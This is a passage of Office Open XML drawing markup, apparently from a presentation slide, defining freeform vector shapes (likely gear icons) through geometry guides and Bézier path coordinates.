                <a:gd name="T70" fmla="*/ 285 w 635"/>
                <a:gd name="T71" fmla="*/ 47 h 635"/>
                <a:gd name="T72" fmla="*/ 368 w 635"/>
                <a:gd name="T73" fmla="*/ 11 h 635"/>
                <a:gd name="T74" fmla="*/ 475 w 635"/>
                <a:gd name="T75" fmla="*/ 31 h 635"/>
                <a:gd name="T76" fmla="*/ 485 w 635"/>
                <a:gd name="T77" fmla="*/ 103 h 635"/>
                <a:gd name="T78" fmla="*/ 569 w 635"/>
                <a:gd name="T79" fmla="*/ 136 h 635"/>
                <a:gd name="T80" fmla="*/ 631 w 635"/>
                <a:gd name="T81" fmla="*/ 226 h 635"/>
                <a:gd name="T82" fmla="*/ 587 w 635"/>
                <a:gd name="T83" fmla="*/ 284 h 635"/>
                <a:gd name="T84" fmla="*/ 587 w 635"/>
                <a:gd name="T85" fmla="*/ 349 h 635"/>
                <a:gd name="T86" fmla="*/ 631 w 635"/>
                <a:gd name="T87" fmla="*/ 407 h 635"/>
                <a:gd name="T88" fmla="*/ 570 w 635"/>
                <a:gd name="T89" fmla="*/ 497 h 635"/>
                <a:gd name="T90" fmla="*/ 485 w 635"/>
                <a:gd name="T91" fmla="*/ 530 h 635"/>
                <a:gd name="T92" fmla="*/ 499 w 635"/>
                <a:gd name="T93" fmla="*/ 569 h 635"/>
                <a:gd name="T94" fmla="*/ 408 w 635"/>
                <a:gd name="T95" fmla="*/ 631 h 635"/>
                <a:gd name="T96" fmla="*/ 107 w 635"/>
                <a:gd name="T97" fmla="*/ 481 h 635"/>
                <a:gd name="T98" fmla="*/ 76 w 635"/>
                <a:gd name="T99" fmla="*/ 450 h 635"/>
                <a:gd name="T100" fmla="*/ 69 w 635"/>
                <a:gd name="T101" fmla="*/ 449 h 635"/>
                <a:gd name="T102" fmla="*/ 52 w 635"/>
                <a:gd name="T103" fmla="*/ 240 h 635"/>
                <a:gd name="T104" fmla="*/ 69 w 635"/>
                <a:gd name="T105" fmla="*/ 184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6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6"/>
                    <a:pt x="285" y="586"/>
                    <a:pt x="285" y="586"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="601"/>
                    <a:pt x="278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5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94" y="495"/>
                    <a:pt x="80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7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1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1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5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3"/>
                    <a:pt x="429" y="515"/>
                    <a:pt x="447" y="497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07" y="437"/>
                    <a:pt x="519" y="432"/>
                    <a:pt x="531" y="432"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="432"/>
                    <a:pt x="531" y="432"/>
                    <a:pt x="531" y="432"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="543" y="432"/>
                    <a:pt x="554" y="437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6" y="399"/>
                    <a:pt x="536" y="378"/>
                    <a:pt x="536" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="536" y="280"/>
                    <a:pt x="536" y="280"/>
                    <a:pt x="536" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="536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53" y="197"/>
                    <a:pt x="542" y="201"/>
                    <a:pt x="531" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="201"/>
                    <a:pt x="531" y="201"/>
                    <a:pt x="531" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519" y="201"/>
                    <a:pt x="507" y="196"/>
                    <a:pt x="498" y="187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5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4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6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5" y="79"/>
                    <a:pt x="137" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="50"/>
                    <a:pt x="148" y="38"/>
                    <a:pt x="161" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="19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3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0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76" y="450"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="450"/>
                    <a:pt x="76" y="450"/>
                    <a:pt x="76" y="450"/>
                  </a:cubicBezTo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moveTo>
                    <a:pt x="69" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="184"/>
                    <a:pt x="69" y="184"/>
                    <a:pt x="69" y="184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6" name="Freeform 359">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13A795DC-CE4F-45F9-B39D-99A7DA22CF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5029" y="3807487"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123 w 255"/>
                <a:gd name="T1" fmla="*/ 250 h 250"/>
                <a:gd name="T2" fmla="*/ 48 w 255"/>
                <a:gd name="T3" fmla="*/ 222 h 250"/>
                <a:gd name="T4" fmla="*/ 8 w 255"/>
                <a:gd name="T5" fmla="*/ 110 h 250"/>
                <a:gd name="T6" fmla="*/ 34 w 255"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 33 w 255"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 199 w 255"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 255"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 123 w 255"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 50 w 255"/>
                <a:gd name="T17" fmla="*/ 97 h 250"/>
                <a:gd name="T18" fmla="*/ 57 w 255"/>
                <a:gd name="T19" fmla="*/ 119 h 250"/>
                <a:gd name="T20" fmla="*/ 80 w 255"/>
                <a:gd name="T21" fmla="*/ 184 h 250"/>
                <a:gd name="T22" fmla="*/ 175 w 255"/>
                <a:gd name="T23" fmla="*/ 176 h 250"/>
                <a:gd name="T24" fmla="*/ 167 w 255"/>
                <a:gd name="T25" fmla="*/ 80 h 250"/>
                <a:gd name="T26" fmla="*/ 72 w 255"/>
                <a:gd name="T27" fmla="*/ 88 h 250"/>
                <a:gd name="T28" fmla="*/ 50 w 255"/>
                <a:gd name="T29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5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5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8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39" y="56"/>
                    <a:pt x="96" y="60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7" name="Freeform 360">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{415ADB58-650A-4C9F-9BB5-05FF50CF47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25291" y="4009700"/>
              <a:ext cx="475626" cy="472778"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 368 w 635"/>
                <a:gd name="T1" fmla="*/ 624 h 636"/>
                <a:gd name="T2" fmla="*/ 350 w 635"/>
                <a:gd name="T3" fmla="*/ 587 h 636"/>
                <a:gd name="T4" fmla="*/ 267 w 635"/>
                <a:gd name="T5" fmla="*/ 624 h 636"/>
                <a:gd name="T6" fmla="*/ 160 w 635"/>
                <a:gd name="T7" fmla="*/ 603 h 636"/>
                <a:gd name="T8" fmla="*/ 150 w 635"/>
                <a:gd name="T9" fmla="*/ 531 h 636"/>
                <a:gd name="T10" fmla="*/ 104 w 635"/>
                <a:gd name="T11" fmla="*/ 485 h 636"/>
                <a:gd name="T12" fmla="*/ 32 w 635"/>
                <a:gd name="T13" fmla="*/ 475 h 636"/>
                <a:gd name="T14" fmla="*/ 12 w 635"/>
                <a:gd name="T15" fmla="*/ 368 h 636"/>
                <a:gd name="T16" fmla="*/ 48 w 635"/>
                <a:gd name="T17" fmla="*/ 285 h 636"/>
                <a:gd name="T18" fmla="*/ 4 w 635"/>
                <a:gd name="T19" fmla="*/ 227 h 636"/>
                <a:gd name="T20" fmla="*/ 66 w 635"/>
                <a:gd name="T21" fmla="*/ 137 h 636"/>
                <a:gd name="T22" fmla="*/ 108 w 635"/>
                <a:gd name="T23" fmla="*/ 153 h 636"/>
                <a:gd name="T24" fmla="*/ 73 w 635"/>
                <a:gd name="T25" fmla="*/ 189 h 636"/>
                <a:gd name="T26" fmla="*/ 98 w 635"/>
                <a:gd name="T27" fmla="*/ 281 h 636"/>
                <a:gd name="T28" fmla="*/ 54 w 635"/>
                <a:gd name="T29" fmla="*/ 400 h 636"/>
                <a:gd name="T30" fmla="*/ 137 w 635"/>
                <a:gd name="T31" fmla="*/ 447 h 636"/>
                <a:gd name="T32" fmla="*/ 189 w 635"/>
                <a:gd name="T33" fmla="*/ 562 h 636"/>
                <a:gd name="T34" fmla="*/ 281 w 635"/>
                <a:gd name="T35" fmla="*/ 537 h 636"/>
                <a:gd name="T36" fmla="*/ 400 w 635"/>
                <a:gd name="T37" fmla="*/ 582 h 636"/>
                <a:gd name="T38" fmla="*/ 447 w 635"/>
                <a:gd name="T39" fmla="*/ 498 h 636"/>
                <a:gd name="T40" fmla="*/ 531 w 635"/>
                <a:gd name="T41" fmla="*/ 433 h 636"/>
                <a:gd name="T42" fmla="*/ 563 w 635"/>
                <a:gd name="T43" fmla="*/ 446 h 636"/>
                <a:gd name="T44" fmla="*/ 537 w 635"/>
                <a:gd name="T45" fmla="*/ 354 h 636"/>
                <a:gd name="T46" fmla="*/ 581 w 635"/>
                <a:gd name="T47" fmla="*/ 235 h 636"/>
                <a:gd name="T48" fmla="*/ 531 w 635"/>
                <a:gd name="T49" fmla="*/ 202 h 636"/>
                <a:gd name="T50" fmla="*/ 499 w 635"/>
                <a:gd name="T51" fmla="*/ 188 h 636"/>
                <a:gd name="T52" fmla="*/ 434 w 635"/>
                <a:gd name="T53" fmla="*/ 104 h 636"/>
                <a:gd name="T54" fmla="*/ 400 w 635"/>
                <a:gd name="T55" fmla="*/ 54 h 636"/>
                <a:gd name="T56" fmla="*/ 281 w 635"/>
                <a:gd name="T57" fmla="*/ 98 h 636"/>
                <a:gd name="T58" fmla="*/ 190 w 635"/>
                <a:gd name="T59" fmla="*/ 73 h 636"/>
                <a:gd name="T60" fmla="*/ 189 w 635"/>
                <a:gd name="T61" fmla="*/ 136 h 636"/>
                <a:gd name="T62" fmla="*/ 131 w 635"/>
                <a:gd name="T63" fmla="*/ 159 h 636"/>
                <a:gd name="T64" fmla="*/ 150 w 635"/>
                <a:gd name="T65" fmla="*/ 104 h 636"/>
                <a:gd name="T66" fmla="*/ 161 w 635"/>
                <a:gd name="T67" fmla="*/ 32 h 636"/>
                <a:gd name="T68" fmla="*/ 267 w 635"/>
                <a:gd name="T69" fmla="*/ 12 h 636"/>
                <a:gd name="T70" fmla="*/ 350 w 635"/>
                <a:gd name="T71" fmla="*/ 48 h 636"/>
                <a:gd name="T72" fmla="*/ 409 w 635"/>
                <a:gd name="T73" fmla="*/ 5 h 636"/>
                <a:gd name="T74" fmla="*/ 498 w 635"/>
                <a:gd name="T75" fmla="*/ 66 h 636"/>
                <a:gd name="T76" fmla="*/ 531 w 635"/>
                <a:gd name="T77" fmla="*/ 150 h 636"/>
                <a:gd name="T78" fmla="*/ 603 w 635"/>
                <a:gd name="T79" fmla="*/ 160 h 636"/>
                <a:gd name="T80" fmla="*/ 624 w 635"/>
                <a:gd name="T81" fmla="*/ 267 h 636"/>
                <a:gd name="T82" fmla="*/ 587 w 635"/>
                <a:gd name="T83" fmla="*/ 285 h 636"/>
                <a:gd name="T84" fmla="*/ 624 w 635"/>
                <a:gd name="T85" fmla="*/ 368 h 636"/>
                <a:gd name="T86" fmla="*/ 604 w 635"/>
                <a:gd name="T87" fmla="*/ 475 h 636"/>
                <a:gd name="T88" fmla="*/ 531 w 635"/>
                <a:gd name="T89" fmla="*/ 485 h 636"/>
                <a:gd name="T90" fmla="*/ 486 w 635"/>
                <a:gd name="T91" fmla="*/ 531 h 636"/>
                <a:gd name="T92" fmla="*/ 476 w 635"/>
                <a:gd name="T93" fmla="*/ 603 h 636"/>
                <a:gd name="T94" fmla="*/ 396 w 635"/>
                <a:gd name="T95" fmla="*/ 633 h 636"/>
                <a:gd name="T96" fmla="*/ 566 w 635"/>
                <a:gd name="T97" fmla="*/ 186 h 636"/>
                <a:gd name="T98" fmla="*/ 528 w 635"/>
                <a:gd name="T99" fmla="*/ 153 h 636"/>
                <a:gd name="T100" fmla="*/ 482 w 635"/>
                <a:gd name="T101" fmla="*/ 107 h 636"/>
                <a:gd name="T102" fmla="*/ 153 w 635"/>
                <a:gd name="T103" fmla="*/ 107 h 636"/>
                <a:gd name="T104" fmla="*/ 449 w 635"/>
                <a:gd name="T105" fmla="*/ 69 h 636"/>
                <a:gd name="T106" fmla="*/ 186 w 635"/>
                <a:gd name="T107" fmla="*/ 69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35" h="636">
                  <a:moveTo>
                    <a:pt x="396" y="633"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="633"/>
                    <a:pt x="376" y="630"/>
                    <a:pt x="368" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="615"/>
                    <a:pt x="350" y="602"/>
                    <a:pt x="350" y="587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="587"/>
                    <a:pt x="350" y="587"/>
                    <a:pt x="350" y="587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2"/>
                    <a:pt x="279" y="615"/>
                    <a:pt x="267" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="633"/>
                    <a:pt x="241" y="636"/>
                    <a:pt x="227" y="631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="625"/>
                    <a:pt x="181" y="615"/>
                    <a:pt x="160" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="596"/>
                    <a:pt x="139" y="584"/>
                    <a:pt x="137" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="556"/>
                    <a:pt x="140" y="541"/>
                    <a:pt x="150" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="531"/>
                    <a:pt x="150" y="531"/>
                    <a:pt x="150" y="531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6"/>
                    <a:pt x="80" y="500"/>
                    <a:pt x="66" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="496"/>
                    <a:pt x="39" y="488"/>
                    <a:pt x="32" y="475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="454"/>
                    <a:pt x="11" y="432"/>
                    <a:pt x="4" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="395"/>
                    <a:pt x="3" y="380"/>
                    <a:pt x="12" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="357"/>
                    <a:pt x="33" y="350"/>
                    <a:pt x="48" y="350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="285"/>
                    <a:pt x="48" y="285"/>
                    <a:pt x="48" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="285"/>
                    <a:pt x="20" y="279"/>
                    <a:pt x="12" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="255"/>
                    <a:pt x="0" y="241"/>
                    <a:pt x="4" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="204"/>
                    <a:pt x="21" y="181"/>
                    <a:pt x="32" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="147"/>
                    <a:pt x="52" y="139"/>
                    <a:pt x="66" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="135"/>
                    <a:pt x="95" y="140"/>
                    <a:pt x="105" y="150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8" y="163"/>
                    <a:pt x="117" y="179"/>
                    <a:pt x="108" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="198"/>
                    <a:pt x="83" y="198"/>
                    <a:pt x="73" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="204"/>
                    <a:pt x="59" y="219"/>
                    <a:pt x="54" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="236"/>
                    <a:pt x="98" y="256"/>
                    <a:pt x="98" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="354"/>
                    <a:pt x="98" y="354"/>
                    <a:pt x="98" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="379"/>
                    <a:pt x="78" y="399"/>
                    <a:pt x="54" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="416"/>
                    <a:pt x="65" y="431"/>
                    <a:pt x="73" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="429"/>
                    <a:pt x="119" y="429"/>
                    <a:pt x="137" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="499"/>
                    <a:pt x="189" y="499"/>
                    <a:pt x="189" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="516"/>
                    <a:pt x="206" y="545"/>
                    <a:pt x="189" y="562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="570"/>
                    <a:pt x="220" y="577"/>
                    <a:pt x="235" y="582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="557"/>
                    <a:pt x="256" y="537"/>
                    <a:pt x="281" y="537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="537"/>
                    <a:pt x="354" y="537"/>
                    <a:pt x="354" y="537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="537"/>
                    <a:pt x="400" y="557"/>
                    <a:pt x="400" y="582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="416" y="577"/>
                    <a:pt x="432" y="570"/>
                    <a:pt x="446" y="562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="544"/>
                    <a:pt x="430" y="516"/>
                    <a:pt x="447" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="447"/>
                    <a:pt x="499" y="447"/>
                    <a:pt x="499" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="438"/>
                    <a:pt x="519" y="433"/>
                    <a:pt x="531" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="433"/>
                    <a:pt x="531" y="433"/>
                    <a:pt x="531" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="543" y="433"/>
                    <a:pt x="554" y="438"/>
                    <a:pt x="563" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="570" y="431"/>
                    <a:pt x="577" y="416"/>
                    <a:pt x="581" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="557" y="400"/>
                    <a:pt x="537" y="379"/>
                    <a:pt x="537" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="281"/>
                    <a:pt x="537" y="281"/>
                    <a:pt x="537" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="256"/>
                    <a:pt x="557" y="236"/>
                    <a:pt x="581" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="576" y="220"/>
                    <a:pt x="570" y="204"/>
                    <a:pt x="562" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="554" y="197"/>
                    <a:pt x="543" y="202"/>
                    <a:pt x="531" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="202"/>
                    <a:pt x="531" y="202"/>
                    <a:pt x="531" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519" y="202"/>
                    <a:pt x="507" y="197"/>
                    <a:pt x="499" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="137"/>
                    <a:pt x="447" y="137"/>
                    <a:pt x="447" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="438" y="128"/>
                    <a:pt x="434" y="116"/>
                    <a:pt x="434" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="93"/>
                    <a:pt x="438" y="82"/>
                    <a:pt x="446" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="66"/>
                    <a:pt x="416" y="59"/>
                    <a:pt x="400" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="79"/>
                    <a:pt x="379" y="98"/>
                    <a:pt x="354" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="98"/>
                    <a:pt x="281" y="98"/>
                    <a:pt x="281" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="98"/>
                    <a:pt x="236" y="79"/>
                    <a:pt x="235" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="59"/>
                    <a:pt x="205" y="66"/>
                    <a:pt x="190" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="81"/>
                    <a:pt x="202" y="92"/>
                    <a:pt x="202" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="116"/>
                    <a:pt x="197" y="128"/>
                    <a:pt x="189" y="136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57" y="168"/>
                    <a:pt x="141" y="168"/>
                    <a:pt x="131" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="149"/>
                    <a:pt x="121" y="133"/>
                    <a:pt x="131" y="123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0" y="94"/>
                    <a:pt x="136" y="80"/>
                    <a:pt x="138" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="51"/>
                    <a:pt x="148" y="39"/>
                    <a:pt x="161" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="20"/>
                    <a:pt x="204" y="11"/>
                    <a:pt x="227" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="0"/>
                    <a:pt x="255" y="3"/>
                    <a:pt x="267" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="21"/>
                    <a:pt x="285" y="34"/>
                    <a:pt x="285" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="48"/>
                    <a:pt x="350" y="48"/>
                    <a:pt x="350" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="34"/>
                    <a:pt x="357" y="21"/>
                    <a:pt x="368" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="3"/>
                    <a:pt x="395" y="0"/>
                    <a:pt x="409" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="11"/>
                    <a:pt x="454" y="20"/>
                    <a:pt x="475" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="39"/>
                    <a:pt x="496" y="51"/>
                    <a:pt x="498" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="500" y="80"/>
                    <a:pt x="495" y="94"/>
                    <a:pt x="485" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="150"/>
                    <a:pt x="531" y="150"/>
                    <a:pt x="531" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541" y="140"/>
                    <a:pt x="555" y="135"/>
                    <a:pt x="570" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584" y="139"/>
                    <a:pt x="596" y="148"/>
                    <a:pt x="603" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="181"/>
                    <a:pt x="624" y="204"/>
                    <a:pt x="631" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="635" y="241"/>
                    <a:pt x="632" y="255"/>
                    <a:pt x="624" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="279"/>
                    <a:pt x="602" y="285"/>
                    <a:pt x="587" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="285"/>
                    <a:pt x="587" y="285"/>
                    <a:pt x="587" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="350"/>
                    <a:pt x="587" y="350"/>
                    <a:pt x="587" y="350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="602" y="350"/>
                    <a:pt x="615" y="357"/>
                    <a:pt x="624" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="633" y="380"/>
                    <a:pt x="635" y="395"/>
                    <a:pt x="631" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="625" y="431"/>
                    <a:pt x="615" y="454"/>
                    <a:pt x="604" y="475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="597" y="488"/>
                    <a:pt x="585" y="496"/>
                    <a:pt x="570" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="500"/>
                    <a:pt x="542" y="495"/>
                    <a:pt x="531" y="485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96" y="541"/>
                    <a:pt x="501" y="555"/>
                    <a:pt x="499" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="584"/>
                    <a:pt x="488" y="596"/>
                    <a:pt x="476" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="615"/>
                    <a:pt x="432" y="625"/>
                    <a:pt x="409" y="631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="404" y="633"/>
                    <a:pt x="400" y="633"/>
                    <a:pt x="396" y="633"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="566" y="186"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="566" y="186"/>
                    <a:pt x="566" y="186"/>
                    <a:pt x="566" y="186"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="528" y="153"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="528" y="153"/>
                    <a:pt x="528" y="153"/>
                    <a:pt x="528" y="153"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="482" y="107"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="482" y="107"/>
                    <a:pt x="482" y="107"/>
                    <a:pt x="482" y="107"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="153" y="107"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="107"/>
                    <a:pt x="153" y="107"/>
                    <a:pt x="153" y="107"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="450" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="449" y="69"/>
                    <a:pt x="449" y="69"/>
                    <a:pt x="449" y="69"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="450" y="69"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="186" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="69"/>
                    <a:pt x="186" y="69"/>
                    <a:pt x="186" y="6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8" name="Freeform 361">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{201DB215-CD72-46FA-B0D3-3634EBE90A7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70541" y="4146407"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 124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5 w 256"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 34 w 256"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 200 w 256"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 256"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 124 w 256"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 51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30 w 256"/>
                <a:gd name="T23" fmla="*/ 200 h 250"/>
                <a:gd name="T24" fmla="*/ 176 w 256"/>
                <a:gd name="T25" fmla="*/ 176 h 250"/>
                <a:gd name="T26" fmla="*/ 191 w 256"/>
                <a:gd name="T27" fmla="*/ 126 h 250"/>
                <a:gd name="T28" fmla="*/ 167 w 256"/>
                <a:gd name="T29" fmla="*/ 80 h 250"/>
                <a:gd name="T30" fmla="*/ 118 w 256"/>
                <a:gd name="T31" fmla="*/ 64 h 250"/>
                <a:gd name="T32" fmla="*/ 72 w 256"/>
